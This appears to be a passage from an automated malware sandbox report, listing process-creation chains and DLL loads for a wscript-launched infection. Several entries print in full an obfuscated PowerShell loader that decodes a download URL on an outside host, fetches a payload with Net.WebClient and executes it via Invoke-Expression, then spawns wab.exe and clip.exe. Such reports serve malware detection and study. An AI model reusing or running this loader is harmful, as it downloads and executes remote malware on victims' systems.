ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
